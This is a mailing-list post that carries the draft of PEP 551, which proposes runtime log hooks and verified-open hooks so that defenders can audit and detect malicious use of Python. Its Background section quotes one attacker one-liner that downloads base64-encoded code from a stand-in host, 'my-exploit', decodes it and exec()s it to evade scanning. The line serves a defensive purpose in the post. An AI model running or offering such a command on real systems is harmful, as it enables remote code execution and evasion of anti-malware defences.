From steve.dower at python.org  Thu Aug 24 13:13:12 2017
From: steve.dower at python.org (Steve Dower)
Date: Thu, 24 Aug 2017 10:13:12 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python runtime
Message-ID: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>

Hi security-sig,

Those of you who were at the PyCon US language summit this year (or who 
saw the coverage at https://lwn.net/Articles/723823/) may recall that I 
talked briefly about the ways Python is used by attackers to gain and/or 
retain access to systems on local networks.

This comes out of work we've been doing at Microsoft to balance the 
flexibility of scripting languages against their usefulness to malicious 
users. PowerShell in particular has had a lot of work done, and we've 
been doing the same internally for Python. This includes things like 
transcripting (logging every piece of code when it is compiled) and 
signature validation (preventing unsigned code from loading).

This PEP is about upstreaming enough functionality to make it easier to 
maintain these features - it is *not* intended to add specific security 
features to the core release. The aim is to be able to use a standard 
libpython3.7/python37.dll with a custom python3.7/python.exe that adds 
those features (listed in the PEP).

Right now parts of the PEP are incomplete. In particular, the 
Recommendations section is much shorter than I intend, the list of log 
hook locations is also too short, and I have only done a preliminary 
performance analysis. But it's time to get reviews of the overall 
concept. I'd also like to take suggestions for more hook locations and 
relevant recommendations, so feel free to throw them out there. In 
particular, I'm not as up to date on best practices for non-Windows 
platforms as the rest of the list, so feel free to correct or improve 
those parts.

Because ReST+max 80 character width makes tables completely unreadable 
in source, I suggest reading it at 
https://github.com/python/peps/blob/master/pep-0551.rst but I've 
included the full text below for quoting purposes.

My current implementation is available at 
https://github.com/zooba/cpython/tree/sectrans and should work on both 
Windows and Linux. I hope to take this to python-dev by next week and 
spend the dev sprints getting the PEP to the point where it can be accepted.

==========================================================

PEP: 551
Title: Security transparency in the Python runtime
Version: $Revision$
Last-Modified: $Date$
Author: Steve Dower <steve.dower at python.org>
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 23-Aug-2017
Python-Version: 3.7
Post-History:

Abstract
========

This PEP describes additions to the Python API and specific behaviors for the
CPython implementation that make actions taken by the Python runtime visible to
security and auditing tools. The goals in order of increasing importance are to
prevent malicious use of Python, to detect and report on malicious use, and most
importantly to detect attempts to bypass detection. Most of the implementation
responsibility falls on users, who must customize and build Python for their own
environment.

We propose two small sets of public APIs to enable users to reliably build their
copy of Python without having to modify the core runtime, protecting future
maintainability. We also discuss recommendations for users to help them develop
and configure their copy of Python.

Background
==========

Software vulnerabilities are generally seen as bugs that enable remote or
elevated code execution. However, in our modern connected world, the more
dangerous vulnerabilities are those that enable advanced persistent threats
(APTs). APTs are achieved when an attacker is able to penetrate a network,
establish their software on one or more machines, and over time extract data or
intelligence. Some APTs may make themselves known by maliciously damaging data
(e.g., `WannaCrypt 
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt>`_)
or hardware (e.g., `Stuxnet 
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet>`_).
Most attempt to hide their existence and avoid detection. APTs often use a
combination of traditional vulnerabilities, social engineering, phishing (or
spear-phishing), thorough network analysis, and an understanding of
misconfigured environments to establish themselves and do their work.

The first infected machines may not be the final target and may not require
special privileges. For example, an APT that is established as a
non-administrative user on a developer's machine may have the ability to spread
to production machines through normal deployment channels. It is common for APTs
to persist on as many machines as possible, with sheer weight of presence making
them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their tracks, the
biggest barrier to detection is a lack of insight. System administrators with
large networks rely on distributed logs to understand what their machines are
doing, but logs are often filtered to show only error conditions. APTs that are
attempting to avoid detection will rarely generate errors or abnormal events.
Reviewing normal operation logs involves a significant amount of effort, though
work is underway by a number of companies to enable automatic anomaly detection
within operational logs. The tools preferred by attackers are ones that are
already installed on the target machines, since log messages from these tools
are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the existence
of APTs or methods and mitigations that do not apply to this PEP. For further
information about the field, we recommend reading or watching the resources
listed under `Further Reading`_.

Python is a particularly interesting tool for attackers due to its prevalence on
server and developer machines, its ability to execute arbitrary code provided as
data (as opposed to native binaries), and its complete lack of internal logging.
This allows attackers to download, decode, and execute malicious code with a
single command::

     python -c "import urllib.request, base64; exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64').read()).decode())"

This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being written to
disk (base64 is often sufficient to bypass these checks). It also bypasses
protections such as file access control lists or permissions (no file access
occurs), approved application lists (assuming Python has been approved for other
uses), and automated auditing or logging (assuming Python is allowed to access
the internet or access another machine on the local network from which to obtain
its payload).

General consensus among the security community is that totally preventing
attacks is infeasible and defenders should assume that they will often detect
attacks only after they have succeeded. This is known as the "assume breach"
mindset. [1]_ In this scenario, protections such as sandboxing and input
validation have already failed, and the important task is detection, tracking,
and eventual removal of the malicious code. To this end, the primary feature
required from Python is security transparency: the ability to see what
operations the Python runtime is performing that may indicate anomalous or
malicious use. Preventing such use is valuable, but secondary to the need to
know that it is occurring.

To summarise the goals in order of increasing importance:

* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]_

Generally, application and system configuration will determine which events
within a scripting engine are worth logging. However, given that the value of
many logged events is not recognized until after an attack is detected, it is
important to capture as much as possible and filter views rather than filtering
at the source (see the "No Easy Breach" video under `Further Reading`_). Events
that are always of interest include attempts to bypass event logging, attempts
to load and execute code that is not correctly signed or access-controlled, use
of uncommon operating system functionality such as debugging or inter-process
inspection tools, most network access and DNS resolution, and attempts to create
and hide files or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in order to
detect abnormal or malicious usage. Currently, the Python runtime does not
provide any ability to do this, which (anecdotally) has led to organizations
switching to other languages. The aim of this PEP is to enable system
administrators to deploy a security transparent copy of Python that can
integrate with their existing auditing and protection systems.

On Windows, some specific features that may be enabled by this include:

* Script Block Logging [3]_
* DeviceGuard [4]_
* AMSI [5]_
* Persistent Zone Identifiers [6]_
* Event tracing (which includes event forwarding) [7]_

On Linux, some specific features that may be integrated are:

* gnupg [8]_
* sd_journal [9]_
* OpenBSM [10]_
* syslog [11]_
* check execute bit on imported modules


On macOS, some features that may be used with the expanded APIs are:

* OpenBSM [10]_
* syslog [11]_

Overall, the ability to enable these platform-specific features on production
machines is highly appealing to system administrators and will make Python a
more trustworthy dependency for application developers.


Overview of Changes
===================

True security transparency is not fully achievable by Python in isolation. The
runtime can log as many events as it likes, but unless the logs are reviewed and
analyzed there is no value. Python may impose restrictions in the name of
security, but usability may suffer. Different platforms and environments will
require different implementations of certain security features, and
organizations with the resources to fully customize their runtime should be
encouraged to do so.

The aim of these changes is to enable system administrators to integrate Python
into their existing security systems, without dictating what those systems look
like or how they should behave. We propose two API changes to enable this: an
Event Log Hook and a Verified Open Hook. Neither is set by default, and both
require modifying the appropriate entry point to enable any functionality. For
the purposes of validation and example, we propose a new spython/spython.exe
entry point program that enables some basic functionality using these hooks.
However, the expectation is that security-conscious organizations will create
their own entry points to meet their needs.

Event Log Hook
--------------

In order to achieve security transparency, an API is required to raise messages
from within certain operations. These operations are typically deep within the
Python runtime or standard library, such as dynamic code compilation, module
imports, DNS resolution, or use of certain modules such as ``ctypes``.

The new APIs required for log hooks are::

    # Add a logging hook
    sys.addloghook(hook: Callable[[str, tuple], None]) -> None
    int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));

    # Raise an event with all logging hooks
    sys.loghook(event: str, *args) -> None
    int PySys_LogHook(const char *event, PyObject *args);

    # Internal API used during Py_Finalize() - not publicly accessible
    void _Py_ClearLogHooks(void);

Hooks are added by calling ``PySys_AddLogHook()`` from C at any time, including
before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from Python code.
Hooks are never removed or replaced, and existing hooks have an opportunity to
refuse to allow new hooks to be added (adding a logging hook is logged, and so
preexisting hooks can raise an exception to block the new addition).

When events of interest are occurring, code can either call ``PySys_LogHook()``
from C (while the GIL is held) or ``sys.loghook()``. The string argument is the
name of the event, and the tuple contains arguments. A given event name should
have a fixed schema for arguments, and both arguments are considered a public
API (for a given x.y version of Python), and thus should only change between
feature releases with updated documentation.

When an event is logged, each hook is called in the order it was added with the
event name and tuple. If any hook returns with an exception set, later hooks are
ignored and *in general* the Python runtime should terminate. This is
intentional to allow hook implementations to decide how to respond to any
particular event. The typical responses will be to log the event, abort the
operation with an exception, or to immediately terminate the process with an
operating system exit call.
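The ordering and short-circuit rules can be illustrated with a small pure-Python dispatcher. This is a sketch under stated assumptions: ``log_event`` and the three hooks are hypothetical, and the event names and argument shapes are taken from Table 1 below. The first hook only records, the second aborts ``ctypes.*`` events with an exception, and the third is skipped whenever the second raises.

```python
from typing import Callable, List, Tuple

# Hypothetical dispatcher modelling the proposed semantics; not a real API.
_hooks: List[Callable[[str, Tuple], None]] = []
calls: List[str] = []


def log_event(event: str, *args) -> None:
    for hook in _hooks:
        hook(event, args)  # the first exception stops dispatch


def record(event: str, args: Tuple) -> None:
    # Typical response 1: log the event.
    calls.append(f"record {event} {args!r}")


def deny_ctypes(event: str, args: Tuple) -> None:
    # Typical response 2: abort the operation with an exception.
    if event.startswith("ctypes."):
        raise PermissionError(f"{event} is not allowed")


def never_reached_on_abort(event: str, args: Tuple) -> None:
    calls.append(f"late {event}")


_hooks.extend([record, deny_ctypes, never_reached_on_abort])

log_event("import", "json", None, None, None, None)
try:
    log_event("ctypes.dlopen", "libc.so.6")
except PermissionError as exc:
    calls.append(f"aborted: {exc}")
```

A hook choosing the third response would call ``os._exit()`` instead of raising; that is left out here because it would end the interpreter running the example.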

When an event is logged but no hooks have been set, the ``loghook()`` function
should add minimal overhead. Ideally, each argument is a reference to existing
data rather than a value calculated just for the logging call.

As hooks may be Python objects, they need to be freed during ``Py_Finalize()``.
To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases any
``PyObject*`` hooks that are held, as well as any heap memory used. This is an
internal function with no public export, but it passes an event to all existing
hooks to ensure that unexpected calls are logged.

See `Log Hook Locations`_ for proposed log hook points and schemas, and the
`Recommendations`_ section for discussion on appropriate responses.

Verified Open Hook
------------------

Most operating systems have a mechanism to distinguish between files that can be
executed and those that cannot. For example, this may be an execute bit in the
permissions field, or a verified hash of the file contents to detect potential
code tampering. These are important security mechanisms for preventing execution
of data or code that is not approved for a given environment. Currently, Python
has no way to integrate with these when launching scripts or importing modules.

The new public API for the verified open hook is::

    # Set the handler
    int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char *narrow, const wchar_t *wide));

    # Open a file using the handler
    os.open_for_exec(pathlike)

The ``os.open_for_exec()`` function is a drop-in replacement for
``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
binary access; any more restrictive behaviour requires the use of a custom
handler. (Aside: since ``importlib`` requires access to this function before the
``os`` module has been imported, it will be available on the ``nt``/``posix``
modules, but the intent is that other users will access it through the ``os``
module.)
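The default-versus-handler dispatch can be sketched in pure Python. This assumes a Python-level registry for illustration only: ``open_for_exec`` and ``set_open_for_exec_handler`` below are hypothetical models of the proposed ``os.open_for_exec()`` and ``Py_SetOpenForExecuteHandler()``, and the real handler would be installed from C and receive a narrow or wide path.

```python
import io
import os
from typing import BinaryIO, Callable, Optional, Union

PathArg = Union[str, bytes]

# Hypothetical model of the proposed os.open_for_exec(); no released Python
# ships this function, and the real handler would be set from C.
_open_handler: Optional[Callable[[PathArg], BinaryIO]] = None


def set_open_for_exec_handler(handler: Callable[[PathArg], BinaryIO]) -> None:
    """Illustrative stand-in for Py_SetOpenForExecuteHandler()."""
    global _open_handler
    _open_handler = handler


def open_for_exec(pathlike) -> BinaryIO:
    path = os.fspath(pathlike)        # str, bytes or os.PathLike -> str/bytes
    if _open_handler is None:
        return io.open(path, "rb")    # default: raw binary read, no checks
    return _open_handler(path)        # handler's result is returned directly
```

With no handler set this behaves exactly like ``open(pathlike, 'rb')``, which is what lets import machinery switch to it unconditionally.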

A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()`` from C
at any time, including before ``Py_Initialize()``. When ``open_for_exec()`` is
called with a handler set, the handler will be passed the processed narrow or
wide path, depending on platform, and its return value will be returned
directly. The returned object should be an open file-like object that supports
reading raw bytes. This is explicitly intended to allow a ``BytesIO`` instance
if the open handler has already had to read the file into memory in order to
perform whatever verification is necessary to determine whether the content is
permitted to be executed.

Note that these handlers can import and call the ``_io.open()`` function on
CPython without triggering themselves.

If the handler determines that the file is not suitable for execution, it should
raise an exception of its choice, as well as performing any other logging or
notifications.
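A verifying handler that returns ``BytesIO`` might look like the following. This is a minimal sketch, assuming a hypothetical allowlist of SHA-256 digests (``APPROVED_SHA256``) as the verification policy. Real deployments would more likely use platform signature checks such as DeviceGuard, and would load the allowlist from a protected location. The handler reads the file exactly once, so the bytes that were checked are the bytes that get executed.

```python
import hashlib
import io
from typing import Set

# Hypothetical allowlist of SHA-256 digests of approved source files.
APPROVED_SHA256: Set[str] = set()


def verifying_open_handler(path) -> io.BytesIO:
    """Read the file once, verify it, and hand back the verified bytes."""
    # Plain open() here; per the text above, a CPython handler would call
    # _io.open() so that it does not trigger itself.
    with open(path, "rb") as f:
        data = f.read()
    digest = hashlib.sha256(data).hexdigest()
    if digest not in APPROVED_SHA256:
        # Any logging or notification would happen before raising.
        raise PermissionError(f"{path!r} is not approved for execution")
    return io.BytesIO(data)   # in-memory copy; later edits to the file are ignored
```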

All import and execution functionality involving code from a file will be
changed to use ``open_for_exec()`` unconditionally. It is important to note that
calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
function; a log hook that includes the code from these calls will be added and
is the best opportunity to validate code that is read from the file. Given the
current decoupling between import and execution in Python, most imported code
will go through both ``open_for_exec()`` and the log hook for ``compile``, and
so care should be taken to avoid repeating verification steps.

API Availability
----------------

While all the functions added here are considered public and stable API, the
behavior of the functions is implementation specific. The descriptions here
refer to the CPython implementation, and while other implementations should
provide the functions, there is no requirement that they behave the same.

For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but may do
nothing. This allows code to make calls to ``sys.loghook()`` without having to
test for existence, but it should not assume that its call will have any effect.
(Including existence tests in security-critical code allows another vector to
bypass logging, so it is preferable that the function always exist.)

``os.open_for_exec()`` should at a minimum always return
``_io.open(pathlike, 'rb')``. Code using the function should make no further
assumptions about what may occur, and implementations other than CPython are not
required to let developers override the behavior of this function with a hook.


Log Hook Locations
==================

Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the following
operations with the schema in Table 1. Unless otherwise specified, the ability
for log hooks to abort any listed operation should be considered part of the
rationale for including the hook.

.. csv-table:: Table 1: Log Hooks
    :header: "API Function", "Event Name", "Arguments", "Rationale"
    :widths: 2, 2, 3, 6

    ``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log hooks are
    being added."
    ``_Py_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies hooks they are
    being cleaned up, mainly in case the event is triggered unexpectedly. This
    event cannot be aborted."
    ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "Detects
    any attempt to set the ``open_for_exec`` handler."
    "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``", ``compile``, "
    ``(code, filename_or_none)``", "Detect dynamic code compilation. Note that
    this will also be called for regular imports of source code, including those
    that used ``open_for_exec``."
    ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
    sys.path_hooks)``", "Detect when modules are imported. This is raised before
    the module name is resolved to a file. All arguments other than the module
    name may be ``None`` if they are not used or available."
    "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
    ``(module_or_path,)``", "Detect when native modules are used."
    ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "Collect
    information about specific symbols retrieved from native modules."
    ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect when code
    is accessing arbitrary memory using ``ctypes``."
    ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing the id of
    objects, which in CPython reveals information about memory layout."
    ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect when
    code is accessing frames directly."
    ``sys._current_frames``, ``sys._current_frames``, "", "Detect when code is
    accessing frames directly."
    ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is injecting
    trace functions. Because of the implementation, exceptions raised from the
    hook will abort the operation, but will not be raised in Python code. Note
    that ``threading.setprofile`` eventually calls this function, so the event
    will be logged for each thread."
    ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is injecting
    trace functions. Because of the implementation, exceptions raised from the
    hook will abort the operation, but will not be raised in Python code. Note
    that ``threading.settrace`` eventually calls this function, so the event
    will be logged for each thread."
    ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
    Detect changes to async generator hooks."
    ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
    Detect changes to async generator hooks."
    ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "", "
    Detect changes to the coroutine wrapper."
    ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, "``(new_limit,)``", "
    Detect changes to the recursion limit."
    ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, "``(interval_us,)``", "
    Detect changes to the switching interval."
    "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
    ``socket.sendmsg``, ``socket.sendto``", ``socket.address``, "``(address,)``", "
    Detect access to network resources. The address is unmodified from the
    original call."
    ``socket.__init__``, ``socket()``, "``(family, type, proto)``", "Detect
    creation of sockets. The arguments will be int values."
    ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
    retrieve the current host name."
    ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
    attempts to change the current host name. The name argument is passed as a
    bytes object."
    "``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
    ``socket.gethostbyname``", "``(name,)``", "Detect host name resolution. The
    name argument is a str or bytes object."
    ``socket.gethostbyaddr``, ``socket.gethostbyaddr``, "``(address,)``", "Detect
    host resolution. The address argument is a str or bytes object."
    ``socket.getservbyname``, ``socket.getservbyname``, "``(name, protocol)``", "
    Detect service resolution. The arguments are str objects."
    ``socket.getservbyport``, ``socket.getservbyport``, "``(port, protocol)``", "
    Detect service resolution. The port argument is an int and protocol is a
    str."

TODO - more hooks in ``_socket``, ``_ssl``, others?
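A hook consuming the Table 1 events will often just serialize them for an external collector. This is a sketch under stated assumptions: ``make_jsonl_hook`` is a hypothetical helper, and the JSON Lines format is one choice among many. It relies on the ``(event, args)`` hook signature proposed above. ``default=repr`` is used because several events carry arguments that are not JSON-serializable, such as frame objects, ``ctypes`` objects, or the ``bytes`` host name passed to ``socket.sethostname``.

```python
import io
import json
import time
from typing import TextIO, Tuple


def make_jsonl_hook(stream: TextIO):
    """Return a hypothetical hook(event, args) writing one JSON object per line."""
    def hook(event: str, args: Tuple) -> None:
        record = {"time": time.time(), "event": event, "args": args}
        # default=repr records non-JSON arguments instead of failing in the hook.
        stream.write(json.dumps(record, default=repr) + "\n")
        stream.flush()
    return hook


buf = io.StringIO()
hook = make_jsonl_hook(buf)
hook("socket.address", (("198.51.100.7", 443),))
hook("socket.sethostname", (b"build-01",))
```

The hook does not filter anything, which matches the Recommendations below. Filtering belongs in the views built over the collected logs.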


SPython Entry Point
===================

A new entry point binary will be added, called ``spython.exe`` on Windows and
``spythonX.Y`` on other platforms. This entry point is intended primarily as an
example, as we expect most users of this functionality to implement their own
entry point and hooks (see `Recommendations`_). It will also be used for tests.

Source builds will create ``spython`` by default, but distributors may choose
whether to include ``spython`` in their pre-built packages. The python.org
managed binary distributions will not include ``spython``.

**Do not accept most command-line arguments**

The ``spython`` entry point requires a script file to be passed as the first
argument, and does not allow any options. This prevents arbitrary code execution
from in-memory data or non-script files (such as pickles, which can be executed
using ``-m pickle <path>``).

Options ``-B`` (do not write bytecode), ``-E`` (ignore environment variables)
and ``-s`` (no user site) are assumed.

If a file with the same full path as the process with a ``._pth`` suffix
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it will be
used to initialize ``sys.path`` following the rules currently described `for
Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.
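The argument policy can be expressed as a small check. This is a hypothetical sketch of the rule only, since the real ``spython`` is a C entry point. ``script_from_argv`` is an illustrative name, and the sketch assumes that any arguments after the script are passed through to the script unchanged.

```python
from typing import List


def script_from_argv(argv: List[str]) -> str:
    """Return the script path if argv follows the spython rules, else exit.

    Hypothetical illustration of the policy; not the entry point's code.
    """
    if len(argv) < 2:
        raise SystemExit("usage: spython SCRIPT [ARGS...]")
    script = argv[1]
    if script.startswith("-"):
        # No options at all, which rules out -c, -m (e.g. -m pickle), -i, etc.
        raise SystemExit(f"options are not accepted: {script!r}")
    # Assumption: argv[2:] is passed through to the script as its arguments.
    return script
```

Rejecting every leading option is simpler to audit than keeping a list of permitted ones. The fixed ``-B``, ``-E`` and ``-s`` behaviour is applied by the entry point itself rather than by the user.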

**Log security events to a file**

Before initialization, ``spython`` will set a log hook that writes events to a
local file. By default, this file is the full path of the process with a
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
variable (despite such overrides being explicitly discouraged in
`Recommendations`_).

The log hook will also abort all ``addloghook`` events, preventing any other
hooks from being added.
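The behaviour of the ``spython`` log hook can be approximated in Python. The real hook is set from C before initialization, so ``default_log_path`` and ``make_spython_hook`` are hypothetical helpers. The sketch also opens the log file once per event for simplicity, which a real implementation would avoid. The hook writes the event first and only then refuses ``sys.addloghook``, so the blocked attempt still appears in the log.

```python
import os
import sys
from typing import Tuple


def default_log_path() -> str:
    # Full path of the process plus ".log", unless SPYTHONLOG overrides it
    # (an override that the Recommendations section discourages).
    return os.environ.get("SPYTHONLOG") or os.path.abspath(sys.executable) + ".log"


def make_spython_hook(log_path: str):
    """Return a hypothetical hook(event, args) modelled on the spython one."""
    def hook(event: str, args: Tuple) -> None:
        # Record first, so even refused operations leave a trace.
        with open(log_path, "a", encoding="utf-8") as log:
            log.write(f"{event}: {args!r}\n")
        if event == "sys.addloghook":
            raise RuntimeError("additional log hooks are not permitted")
    return hook
```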

On Windows, code from ``compile`` events will be submitted to AMSI [5]_ and if it
fails to validate, the compile event will be aborted. This can be tested by
calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
<http://www.eicar.org/86-0-Intended-use.html>`_.

**Restrict importable modules**

Also before initialization, ``spython`` will set an open-for-execute hook that
validates all files opened with ``os.open_for_exec``. This implementation will
require all files to have a ``.py`` suffix (thereby blocking the use of cached
bytecode), and will raise a custom log message ``spython.open_for_exec``
containing ``(filename, True_if_allowed)``.
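The suffix rule and its custom event can be sketched in Python as follows. ``log_event`` is a hypothetical stand-in for ``sys.loghook()`` that only records events, and ``spython_open_for_exec`` is an illustrative name. The sketch assumes the path arrives as a ``str``. The event is raised for both allowed and refused files, so the log shows every decision.

```python
import io
from typing import BinaryIO, List, Tuple

events: List[Tuple[str, Tuple]] = []


def log_event(event: str, *args) -> None:
    # Hypothetical stand-in for sys.loghook(); here it only records events.
    events.append((event, args))


def spython_open_for_exec(path: str) -> BinaryIO:
    """Allow only .py files, which also blocks cached .pyc bytecode."""
    allowed = path.endswith(".py")
    log_event("spython.open_for_exec", path, allowed)
    if not allowed:
        raise PermissionError(f"only .py files may be executed: {path!r}")
    return io.open(path, "rb")
```

The Windows step of opening the file without write sharing is not modelled here, because Python's built-in ``open()`` does not expose share modes.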

On Windows, the hook will also open the file with flags that prevent any other
process from opening it with write access, which allows the hook to perform
additional validation on the contents with confidence that it will not be
modified between the check and use. Compilation will later trigger a ``compile``
event, so there is no need to read the contents now for AMSI, but other
validation mechanisms such as DeviceGuard [4]_ should be performed here.


Performance Impact
==================

**TODO**

Full impact analysis still requires investigation. Preliminary testing shows
that calling ``sys.loghook`` with no hooks added does not significantly affect
any existing benchmarks, though targeted microbenchmarks can observe an impact.

The performance impact of using ``spython`` or of adding hooks is not of
interest here, since this is considered opt-in functionality.


Recommendations
===============

Specific recommendations are difficult to make, as the ideal 
configuration for any environment will depend on the user's ability to 
manage, monitor, and respond to activity on their own network. However, 
many of the proposals here do not appear to be of value without deeper 
illustration. This section provides recommendations using the terms 
**should** (or **should not**), indicating that we consider it dangerous 
to ignore the advice, and **may**, indicating that the advice ought to be 
considered for high-value systems. The term **sysadmins** refers 
to whoever is responsible for deploying Python throughout your network, 
though different organizations may have different titles for the 
relevant person.

Sysadmins **should** build their own entry point, likely starting from 
``spython``, and directly interface with the security systems available 
in their environment. The more tightly integrated, the less likely a 
vulnerability will be found allowing an attacker to bypass those 
systems. In particular, the entry point **should not** obtain any 
settings from the current environment, such as environment variables, 
unless those settings are otherwise protected from modification.

The default ``python`` entry point **should not** be deployed to 
production machines, but could be given to developers to use and test 
Python on non-production machines. Sysadmins **may** consider deploying 
a less restrictive version of their entry point to developer machines, 
since any system connected to your network is a potential target.

Python deployments **should** be made read-only using any available 
platform functionality after deployment and during use.

On platforms that support it, sysadmins **should** include signatures 
for every file in a Python deployment, ideally verified using a private 
certificate. For example, Windows supports embedding signatures in 
executable files and using catalogs for others, and can use DeviceGuard 
[4]_ to validate signatures either automatically or using an 
``open_for_exec`` hook.

Sysadmins **should** collect as many logged events as possible, and 
**should** copy them off local machines frequently. Even if logs are 
not being constantly monitored for suspicious activity, once an attack 
is detected it is too late to enable logging. Log hooks **should not** 
attempt to preemptively filter events, as even benign events are useful 
when analyzing the progress of an attack. (Watch the "No Easy Breach" 
video under `Further Reading`_ for a deeper look at this side of things.)

Log hooks **should** write events to logs before attempting to abort. As 
discussed earlier, it is more important to record malicious actions than 
to prevent them. Very few actions should be aborted, as most will occur 
during normal use. Sysadmins **may** audit their Python code and abort 
operations that are known to never be used deliberately.
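The "log first, then abort" rule translates directly into hook structure. This is a minimal sketch assuming a hypothetical deny list (``DENIED_EVENTS``) produced by auditing an organization's own code. It uses the standard ``logging`` module as the sink for illustration. The event names come from Table 1, and every event is recorded before the hook decides whether to raise.

```python
import logging
from typing import FrozenSet, Tuple

audit_log = logging.getLogger("python.security")

# Hypothetical deny list: events that audited code never triggers on purpose.
# Everything else is logged and allowed to proceed.
DENIED_EVENTS: FrozenSet[str] = frozenset({"ctypes.dlopen", "sys.settrace"})


def log_then_abort_hook(event: str, args: Tuple) -> None:
    # 1. Always record the event, including ones about to be refused.
    audit_log.info("%s %r", event, args)
    # 2. Only then decide whether to abort the operation.
    if event in DENIED_EVENTS:
        audit_log.warning("aborting %s", event)
        raise PermissionError(f"{event} is blocked by policy")
```

Keeping the deny list short is deliberate. As the paragraph above notes, most events occur during normal use, and aborting them would break legitimate code without improving detection.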

On production machines, the first log hook **should** be set in C code 
before ``Py_Initialize`` is called, and that hook **should** 
unconditionally abort the ``sys.addloghook`` event. The Python interface 
is mainly useful for testing.

On production machines, a non-validating ``open_for_exec`` hook **may** 
be set in C code before ``Py_Initialize`` is called. This prevents later 
code from overriding the hook; however, logging the 
``setopenforexecutehandler`` event is still useful, since no code should 
ever need to call it. Using at least the sample ``open_for_exec`` hook 
implementation from ``spython`` is recommended.

[TODO: more good advice; less bad advice]

Further Reading
===============


**Redefining Malware: When Old Terms Pose New Threats**
     By Aviv Raff for SecurityWeek, 29th January 2014

     This article, and those linked by it, are high-level summaries of the rise of
     APTs and the differences from "traditional" malware.

     `<http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats>`_

**Anatomy of a Cyber Attack**
     By FireEye, accessed 23rd August 2017

     A summary of the techniques used by APTs, and links to a number of relevant
     whitepapers.

     `<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html>`_

**Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection**
     By Aviv Raff for SecurityWeek, 8th May 2014

     High-level summary of the value of detailed logging and automatic analysis.

     `<http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection>`_

**No Easy Breach: Challenges and Lessons Learned from an Epic Investigation**
     Video presented by Matt Dunwoody and Nick Carr for Mandiant at ShmooCon 2016

     Detailed walkthrough of the processes and tools used in detecting and removing
     an APT.

     `<https://archive.org/details/No_Easy_Breach>`_

**Disrupting Nation State Hackers**
     Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

     Good security practices, capabilities and recommendations from the chief of
     NSA's Tailored Access Operations.

     `<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_

References
==========

.. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_

.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
    Protection Advances in Windows 10,
    `<https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>`_

.. [3] `<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>`_

.. [4] `<https://aka.ms/deviceguard>`_

.. [5] AMSI,
    `<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx>`_

.. [6] Persistent Zone Identifiers,
    `<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_

.. [7] Event tracing,
    `<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_

.. [8] `<https://www.gnupg.org/>`_

.. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_

.. [10] `<http://www.trustedbsd.org/openbsm.html>`_

.. [11] `<https://linux.die.net/man/3/syslog>`_

Acknowledgments
===============

Thanks to all the people from Microsoft involved in helping make the Python
runtime safer for production use, and especially to James Powell for doing much
of the initial research, analysis and implementation, Lee Holmes for invaluable
insights into the info-sec field and PowerShell's responses, and Brett Cannon
for the grounding discussions.

Copyright
=========

Copyright (c) 2017 by Microsoft Corporation. This material may be distributed
only subject to the terms and conditions set forth in the Open Publication
License, v1.0 or later (the latest version is presently available at
http://www.opencontent.org/openpub/).

